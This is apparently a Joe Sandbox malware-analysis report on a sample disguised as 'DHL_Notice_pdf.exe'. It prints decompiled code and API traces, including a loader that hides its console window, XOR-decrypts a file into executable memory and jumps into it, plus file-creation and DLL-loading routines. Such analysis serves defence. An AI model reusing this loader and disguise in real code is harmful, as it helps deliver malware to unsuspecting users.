                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E00405F83(WCHAR* _a4) {
                                                            				WCHAR* _t5;
                                                            				WCHAR* _t7;
                                                            
                                                            				_t7 = _a4;
                                                            				_t5 =  &(_t7[lstrlenW(_t7)]);
                                                            				while( *_t5 != 0x5c) {
                                                            					_push(_t5);
                                                            					_push(_t7);
                                                            					_t5 = CharPrevW();
                                                            					if(_t5 > _t7) {
                                                            						continue;
                                                            					}
                                                            					break;
                                                            				}
                                                            				 *_t5 =  *_t5 & 0x00000000;
                                                            				return  &(_t5[1]);
                                                            			}






                                                            APIs
                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL_Notice_pdf.exe,C:\Users\user\Desktop\DHL_Notice_pdf.exe,80000000,00000003), ref: 00405F89
                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL_Notice_pdf.exe,C:\Users\user\Desktop\DHL_Notice_pdf.exe,80000000,00000003), ref: 00405F99
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: CharPrevlstrlen
                                                            • String ID: C:\Users\user\Desktop
                                                            • API String ID: 2709904686-1669384263
                                                            • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                            • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                                                            • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                            • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                            				int _v8;
                                                            				int _t12;
                                                            				int _t14;
                                                            				int _t15;
                                                            				CHAR* _t17;
                                                            				CHAR* _t27;
                                                            
                                                            				_t12 = lstrlenA(_a8);
                                                            				_t27 = _a4;
                                                            				_v8 = _t12;
                                                            				while(lstrlenA(_t27) >= _v8) {
                                                            					_t14 = _v8;
                                                            					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                            					_t15 = lstrcmpiA(_t27, _a8);
                                                            					_t27[_v8] =  *(_t14 + _t27);
                                                            					if(_t15 == 0) {
                                                            						_t17 = _t27;
                                                            					} else {
                                                            						_t27 = CharNextA(_t27);
                                                            						continue;
                                                            					}
                                                            					L5:
                                                            					return _t17;
                                                            				}
                                                            				_t17 = 0;
                                                            				goto L5;
                                                            			}










                                                            APIs
                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                            • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                                                            • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                            • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                            • String ID:
                                                            • API String ID: 190613189-0
                                                            • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                            • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                            • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                            • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:63.5%
                                                            Dynamic/Decrypted Code Coverage:92.5%
                                                            Signature Coverage:15.8%
                                                            Total number of Nodes:120
                                                            Total number of Limit Nodes:10


                                                            Control-flow Graph

                                                            control_flow_graph 184 4208b7-4209ab call 42005f call 420838 call 420073 * 8 206 4209b2-4209c2 184->206 207 4209ad 184->207 210 4209c4 206->210 211 4209c9-4209ec CreateFileW 206->211 208 420ee6-420ee9 207->208 210->208 212 4209f3-420a19 VirtualAlloc ReadFile 211->212 213 4209ee 211->213 214 420a20-420a33 212->214 215 420a1b 212->215 213->208 217 420ed0-420edf call 42020a 214->217 218 420a39-420ecb 214->218 215->208 221 420ee1-420ee3 ExitProcess 217->221
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.245387328.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_420000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: AllocNumaVirtual
                                                            • String ID:
                                                            • API String ID: 4233825816-0
                                                            • Opcode ID: 45ccf47f97950f780e34278eb1c0095043e0ea22b598778c2579e9b66a61e680
                                                            • Instruction ID: feb01ae73c05315a2f2661747642a0421ea82d5dadaa70ec78252cb21e0edcf1
                                                            • Opcode Fuzzy Hash: 45ccf47f97950f780e34278eb1c0095043e0ea22b598778c2579e9b66a61e680
                                                            • Instruction Fuzzy Hash: 4B226460D5D2E8ADDF06CBE994517FDBFB05E26202F0845DAE0E5A5283C13A834E9B25
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            control_flow_graph 246 4207da-420820 call 42005f call 420073 GetSystemInfo 252 420822-420825 246->252 253 420829 246->253 254 42082b-42082e 252->254 253->254
                                                            APIs
                                                            • GetSystemInfo.KERNELBASE(?), ref: 004207F7
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.245387328.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_420000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: InfoSystem
                                                            • String ID:
                                                            • API String ID: 31276548-0
                                                            • Opcode ID: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                                            • Instruction ID: 2d904a6e80aa5fef5fe1180fc8d06bc727ef1bd0b01c4b10035705b1c24dd688
                                                            • Opcode Fuzzy Hash: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                                            • Instruction Fuzzy Hash: 31F0A771F1411CAFDB08F6B8A8456BFB7FCDB08300F50456EE606E2242D938854142A5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 77%
                                                            			E00401130(intOrPtr _a8) {
                                                            				signed int _v8;
                                                            				struct _IO_FILE* _v12;
                                                            				int _v16;
                                                            				void* _v20;
                                                            				char* _v24;
                                                            				struct HWND__* _t32;
                                                            				struct _IO_FILE* _t36;
                                                            				long _t39;
                                                            				void* _t42;
                                                            
                                                            				_v8 = 0;
                                                            				_v16 = 0;
                                                            				_v24 = "248058040134";
                                                            				__imp__GetConsoleWindow(); // executed
                                                            				ShowWindow(_t32, 0); // executed
                                                            				_t36 = fopen( *(_a8 + (4 << 0)), 0x4030a4); // executed
                                                            				_v12 = _t36;
                                                            				fseek(_v12, 0, 2); // executed
                                                            				_t39 = ftell(_v12); // executed
                                                            				_v16 = _t39;
                                                            				fseek(_v12, 0, 0); // executed
                                                            				_t42 = VirtualAlloc(0, _v16, 0x3000, 0x40); // executed
                                                            				_v20 = _t42;
                                                            				fread(_v20, _v16, 1, _v12); // executed
                                                            				while(_v8 < _v16) {
                                                            					asm("cdq");
                                                            					 *((char*)(_v20 + _v8)) =  *(_v20 + _v8) & 0x000000ff ^ _v24[_v8 % 0xc] & 0x000000ff;
                                                            					_v8 = _v8 + 1;
                                                            				}
                                                            				goto __eax;
                                                            			}













                                                            APIs
                                                            • GetConsoleWindow.KERNELBASE(00000000), ref: 0040114D
                                                            • ShowWindow.USER32(00000000), ref: 00401154
                                                            • fopen.MSVCRT ref: 0040116E
                                                            • fseek.MSVCRT ref: 00401182
                                                            • ftell.MSVCRT ref: 0040118F
                                                            • fseek.MSVCRT ref: 004011A3
                                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040,?,?,?,?,?,?,?,?,?,?,?), ref: 004011B9
                                                            • fread.MSVCRT ref: 004011D0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.245356618.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.245350817.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000001.00000002.245369666.0000000000402000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000001.00000002.245374337.0000000000403000.00000004.00000001.01000000.00000004.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: Windowfseek$AllocConsoleShowVirtualfopenfreadftell
                                                            • String ID: 248058040134
                                                            • API String ID: 1512859468-1212554544
                                                            • Opcode ID: b712b21930f84f64824a409d480e028470c4028a14380c671e8f8a1558e94d43
                                                            • Instruction ID: 9f35d128f0fc62b34356d4069eab162610d2d2ef3205a5c4f266a8a3b99c8786
                                                            • Opcode Fuzzy Hash: b712b21930f84f64824a409d480e028470c4028a14380c671e8f8a1558e94d43
                                                            • Instruction Fuzzy Hash: 4F315EB0E00208EFDB04DF94DE59BAEBB75EF44305F1084A9E601BB2D1D7B56A10CB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 68%
                                                            			_entry_(void* __ebx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				intOrPtr* _v24;
                                                            				intOrPtr _v28;
                                                            				int _v32;
                                                            				char** _v36;
                                                            				int _v40;
                                                            				void _v44;
                                                            				char** _v48;
                                                            				intOrPtr _v52;
                                                            				intOrPtr* _t18;
                                                            				intOrPtr* _t19;
                                                            				void _t24;
                                                            				int _t30;
                                                            				intOrPtr* _t31;
                                                            				intOrPtr _t34;
                                                            				intOrPtr _t35;
                                                            				intOrPtr _t38;
                                                            				intOrPtr _t46;
                                                            
                                                            				_push(0xffffffff);
                                                            				_push(0x402180);
                                                            				_push(0x401226);
                                                            				_push( *[fs:0x0]);
                                                            				 *[fs:0x0] = _t46;
                                                            				_v28 = _t46 - 0x20;
                                                            				_v8 = _v8 & 0x00000000;
                                                            				__set_app_type(1);
                                                            				 *0x4030b8 =  *0x4030b8 | 0xffffffff;
                                                            				 *0x4030bc =  *0x4030bc | 0xffffffff;
                                                            				_t18 = __p__fmode();
                                                            				_t34 =  *0x4030b4; // 0x0
                                                            				 *_t18 = _t34;
                                                            				_t19 = __p__commode();
                                                            				_t35 =  *0x4030b0; // 0x0
                                                            				 *_t19 = _t35;
                                                            				 *0x4030c0 = _adjust_fdiv;
                                                            				E00401125( *_adjust_fdiv);
                                                            				if( *0x403010 == 0) {
                                                            					__setusermatherr(E00401122);
                                                            				}
                                                            				E00401110();
                                                            				_push(0x40300c);
                                                            				_push(0x403008);
                                                            				L00401220();
                                                            				_t24 =  *0x4030ac; // 0x0
                                                            				_v44 = _t24;
                                                            				__getmainargs( &_v32,  &_v48,  &_v36,  *0x4030a8,  &_v44);
                                                            				_push(0x403004);
                                                            				_push(0x403000);
                                                            				L00401220();
                                                            				_t30 = __p___initenv();
                                                            				 *_t30 = _v36;
                                                            				_push(_v36);
                                                            				E00401130(_v32, _v48); // executed
                                                            				_v40 = _t30;
                                                            				exit(_t30);
                                                            				_t31 = _v24;
                                                            				_t38 =  *((intOrPtr*)( *_t31));
                                                            				_v52 = _t38;
                                                            				_push(_t31);
                                                            				_push(_t38);
                                                            				L0040121A();
                                                            				return _t31;
                                                            			}






















                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.245356618.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.245350817.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000001.00000002.245369666.0000000000402000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000001.00000002.245374337.0000000000403000.00000004.00000001.01000000.00000004.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: _initterm$FilterXcpt__getmainargs__p___initenv__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                            • String ID:
                                                            • API String ID: 167530163-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,00421780,7FAB7E30), ref: 00420FB0
                                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,00421780,7FAB7E30,0042143E,00000000,00000040), ref: 00420FDA
                                                            • ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,00421780,7FAB7E30,0042143E,00000000), ref: 00420FF1
                                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,00421780,7FAB7E30,0042143E,00000000,00000040), ref: 00421013
                                                            • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,00421780,7FAB7E30,0042143E,00000000,00000040,?,00000000,0000000E), ref: 00421085
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,00421780,7FAB7E30,0042143E,00000000,00000040,?), ref: 00421090
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,00421780,7FAB7E30,0042143E,00000000,00000040,?), ref: 004210DB
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.245387328.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_420000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                            • String ID:
                                                            • API String ID: 656311269-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.245387328.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_420000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: D
                                                            • API String ID: 0-2746444292
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 004207DA: GetSystemInfo.KERNELBASE(?), ref: 004207F7
                                                            • VirtualAllocExNuma.KERNELBASE(00000000), ref: 0042089D
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.245387328.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_420000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: AllocInfoNumaSystemVirtual
                                                            • String ID:
                                                            • API String ID: 449148690-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 00420777
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.245387328.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_420000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage: 3.9%
                                                            Dynamic/Decrypted Code Coverage: 2.5%
                                                            Signature Coverage: 4.6%
                                                            Total number of Nodes: 651
                                                            Total number of Limit Nodes: 79
34525->34526 34684 a398f0 LdrInitializeThunk 34526->34684 34527 40df0b 34529 410163 34527->34529 34530 410180 34529->34530 34685 41e193 34530->34685 34533 4101c8 34533->34468 34534 41e1e3 2 API calls 34535 4101f1 34534->34535 34535->34468 34537 41e1ff 34536->34537 34538 41f193 LdrLoadDll 34536->34538 34692 a39780 LdrInitializeThunk 34537->34692 34538->34537 34539 40df6e 34539->34474 34539->34477 34542 41f193 LdrLoadDll 34541->34542 34543 41e24f 34542->34543 34693 a397a0 LdrInitializeThunk 34543->34693 34544 40e042 34544->34485 34547 41f193 LdrLoadDll 34546->34547 34548 41e00f 34547->34548 34694 a39a20 LdrInitializeThunk 34548->34694 34549 40e095 34549->34489 34551->34498 34552->34496 34555 40a2da 34553->34555 34554 40a53f 34554->34505 34555->34554 34556 409453 4 API calls 34555->34556 34557 40a32d 34556->34557 34557->34554 34558 409713 2 API calls 34557->34558 34559 40a3bc 34558->34559 34559->34554 34560 409453 4 API calls 34559->34560 34561 40a3d1 34560->34561 34561->34554 34562 409713 2 API calls 34561->34562 34565 40a431 34562->34565 34563 409453 4 API calls 34563->34565 34564 409d63 14 API calls 34564->34565 34565->34554 34565->34563 34565->34564 34566 409713 2 API calls 34565->34566 34566->34565 34568 409d88 34567->34568 34603 41dee3 34568->34603 34571 409ddc 34571->34517 34572 409e5d 34636 4102b3 LdrLoadDll NtClose 34572->34636 34573 41e0d3 2 API calls 34574 409e00 34573->34574 34574->34572 34576 409e0b 34574->34576 34578 409e89 34576->34578 34606 40e0b3 34576->34606 34577 409e78 34579 409e95 34577->34579 34580 409e7f 34577->34580 34578->34517 34637 41df63 LdrLoadDll 34579->34637 34582 41e663 2 API calls 34580->34582 34582->34578 34583 409e25 34583->34578 34626 409b93 34583->34626 34585 409ec0 34587 40e0b3 5 API calls 34585->34587 34589 409ee0 34587->34589 34589->34578 34638 41df93 LdrLoadDll 34589->34638 34591 409f05 34639 41e023 LdrLoadDll 34591->34639 34593 409f1f 34594 41dff3 2 API calls 34593->34594 34595 409f2e 34594->34595 34596 41e663 2 API calls 
34595->34596 34597 409f38 34596->34597 34640 409963 34597->34640 34599 409f4c 34599->34517 34600->34511 34601->34513 34602->34515 34604 41f193 LdrLoadDll 34603->34604 34605 409dd2 34604->34605 34605->34571 34605->34572 34605->34573 34607 40e0e1 34606->34607 34608 410163 3 API calls 34607->34608 34609 40e143 34608->34609 34610 40e18c 34609->34610 34611 41e1e3 2 API calls 34609->34611 34610->34583 34612 40e16e 34611->34612 34613 40e178 34612->34613 34617 40e198 34612->34617 34614 41e233 2 API calls 34613->34614 34615 40e182 34614->34615 34616 41e663 2 API calls 34615->34616 34616->34610 34618 40e222 34617->34618 34619 40e205 34617->34619 34620 41e233 2 API calls 34618->34620 34621 41e663 2 API calls 34619->34621 34622 40e231 34620->34622 34623 40e20f 34621->34623 34624 41e663 2 API calls 34622->34624 34623->34583 34625 40e23b 34624->34625 34625->34583 34628 409ba5 34626->34628 34627 409d34 34627->34517 34628->34627 34656 409753 34628->34656 34630 409ca8 34630->34627 34631 409963 11 API calls 34630->34631 34632 409cd6 34631->34632 34632->34627 34633 41e0d3 2 API calls 34632->34633 34634 409d0b 34633->34634 34634->34627 34635 41e6d3 2 API calls 34634->34635 34635->34627 34636->34577 34637->34585 34638->34591 34639->34593 34641 40998c 34640->34641 34663 4098c3 34641->34663 34644 41e6d3 2 API calls 34645 40999f 34644->34645 34645->34644 34646 409a2a 34645->34646 34648 409a25 34645->34648 34671 410333 34645->34671 34646->34599 34647 41e663 2 API calls 34649 409a5d 34647->34649 34648->34647 34649->34646 34650 41dee3 LdrLoadDll 34649->34650 34651 409ac2 34650->34651 34651->34646 34675 41df23 34651->34675 34653 409b26 34653->34646 34654 419143 8 API calls 34653->34654 34655 409b7b 34654->34655 34655->34599 34657 409852 34656->34657 34658 409768 34656->34658 34657->34630 34658->34657 34659 419143 8 API calls 34658->34659 34661 4097d5 34659->34661 34660 4097fc 34660->34630 34661->34660 34662 4200c3 2 API calls 34661->34662 34662->34660 34664 4098dd 34663->34664 34665 40cf43 
LdrLoadDll 34664->34665 34666 4098f8 34665->34666 34667 419553 LdrLoadDll 34666->34667 34668 409910 34667->34668 34669 40992c 34668->34669 34670 409919 PostThreadMessageW 34668->34670 34669->34645 34670->34669 34672 410346 34671->34672 34678 41e063 34672->34678 34676 41f193 LdrLoadDll 34675->34676 34677 41df3f 34676->34677 34677->34653 34679 41f193 LdrLoadDll 34678->34679 34680 41e07f 34679->34680 34683 a39840 LdrInitializeThunk 34680->34683 34681 410371 34681->34645 34683->34681 34684->34527 34686 41e1a9 34685->34686 34687 41f193 LdrLoadDll 34686->34687 34688 41e1af 34687->34688 34691 a399a0 LdrInitializeThunk 34688->34691 34689 4101c1 34689->34533 34689->34534 34691->34689 34692->34539 34693->34544 34694->34549 34695 40b503 34696 40b528 34695->34696 34697 40cf43 LdrLoadDll 34696->34697 34698 40b55b 34697->34698 34699 40b580 34698->34699 34701 40eaf3 34698->34701 34702 40eb1f 34701->34702 34703 41e3b3 LdrLoadDll 34702->34703 34704 40eb38 34703->34704 34705 40eb3f 34704->34705 34712 41e3f3 34704->34712 34705->34699 34709 40eb7a 34710 41e663 2 API calls 34709->34710 34711 40eb9d 34710->34711 34711->34699 34713 41e40f 34712->34713 34714 41f193 LdrLoadDll 34712->34714 34718 a39710 LdrInitializeThunk 34713->34718 34714->34713 34715 40eb62 34715->34705 34717 41e9e3 LdrLoadDll 34715->34717 34717->34709 34718->34715 34721 a39540 LdrInitializeThunk 34723 42135c 34724 4212fd 34723->34724 34727 421363 34723->34727 34725 42130d 34724->34725 34726 4201a3 2 API calls 34724->34726 34724->34727 34728 4200c3 2 API calls 34725->34728 34726->34725 34729 421330 34728->34729

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 143 40cf43-40cf6c call 420e53 146 40cf72-40cf80 call 421373 143->146 147 40cf6e-40cf71 143->147 150 40cf90-40cfa1 call 41f703 146->150 151 40cf82-40cf8d call 4215f3 146->151 156 40cfa3-40cfb7 LdrLoadDll 150->156 157 40cfba-40cfbd 150->157 151->150 156->157
                                                            C-Code - Quality: 100%
                                                            			E0040CF43(void* __eflags, void* _a4, intOrPtr _a8) {
                                                            				char* _v8;
                                                            				struct _EXCEPTION_RECORD _v12;
                                                            				struct _OBJDIR_INFORMATION _v16;
                                                            				char _v536;
                                                            				void* _t15;
                                                            				struct _OBJDIR_INFORMATION _t17;
                                                            				struct _OBJDIR_INFORMATION _t18;
                                                            				void* _t30;
                                                            				void* _t31;
                                                            				void* _t32;
                                                            
                                                            				_v8 =  &_v536;
                                                            				_t15 = E00420E53( &_v12, 0x104, _a8);
                                                            				_t31 = _t30 + 0xc;
                                                            				if(_t15 != 0) {
                                                            					_t17 = E00421373(__eflags, _v8);
                                                            					_t32 = _t31 + 4;
                                                            					__eflags = _t17;
                                                            					if(_t17 != 0) {
                                                            						E004215F3( &_v12, 0);
                                                            						_t32 = _t32 + 8;
                                                            					}
                                                            					_t18 = E0041F703(_v8);
                                                            					_v16 = _t18;
                                                            					__eflags = _t18;
                                                            					if(_t18 == 0) {
                                                            						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                            						return _v16;
                                                            					}
                                                            					return _t18;
                                                            				} else {
                                                            					return _t15;
                                                            				}
                                                            			}

                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040CFB5
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: 8489fcc92341f42d66faac6a62ee3c93024a01d1882fc47015a7f916a59bd378
                                                            • Instruction ID: eef9a5b2757d79ac7c5e2f6930eefc3df15ab87ea646a953be5e35fc412cbedf
                                                            • Opcode Fuzzy Hash: 8489fcc92341f42d66faac6a62ee3c93024a01d1882fc47015a7f916a59bd378
                                                            • Instruction Fuzzy Hash: 7C0152B1E4010EBBDF10DBE1DC82F9EB3789B54308F0042A6E908A7280F634EB448795
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 158 41e52e-41e584 call 41f193 NtCreateFile
                                                            C-Code - Quality: 79%
                                                            			E0041E52E(HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
                                                            				intOrPtr _v0;
                                                            				long _t21;
                                                            
                                                            				asm("fbld tword [edx-0x74aa83de]");
                                                            				_t15 = _v0;
                                                            				_t3 = _t15 + 0xa6c; // 0xa6c
                                                            				E0041F193( *((intOrPtr*)(_v0 + 0x14)), _t15, _t3,  *((intOrPtr*)(_v0 + 0x14)), 0, 0x28);
                                                            				_t21 = NtCreateFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
                                                            				return _t21;
                                                            			}

                                                            APIs
                                                            • NtCreateFile.NTDLL(00000060,00000000,?,004192AF,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,004192AF,?,00000000,00000060,00000000,00000000), ref: 0041E580
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: e649ee6bc546698869febb0294371ff98a37010275feddef859584c4e7f0806b
                                                            • Instruction ID: 156706fe607d690ab6be54b4b2e7a4e23d1c2cf90179f7226c928974bd938377
                                                            • Opcode Fuzzy Hash: e649ee6bc546698869febb0294371ff98a37010275feddef859584c4e7f0806b
                                                            • Instruction Fuzzy Hash: 9E01CFB2200108BFCB08CF98DC85EEB77AEAF8C354F058659BA0DD7245C630E851CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 161 41e533-41e549 162 41e54f-41e584 NtCreateFile 161->162 163 41e54a call 41f193 161->163 163->162
                                                            C-Code - Quality: 100%
                                                            			E0041E533(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                            				long _t21;
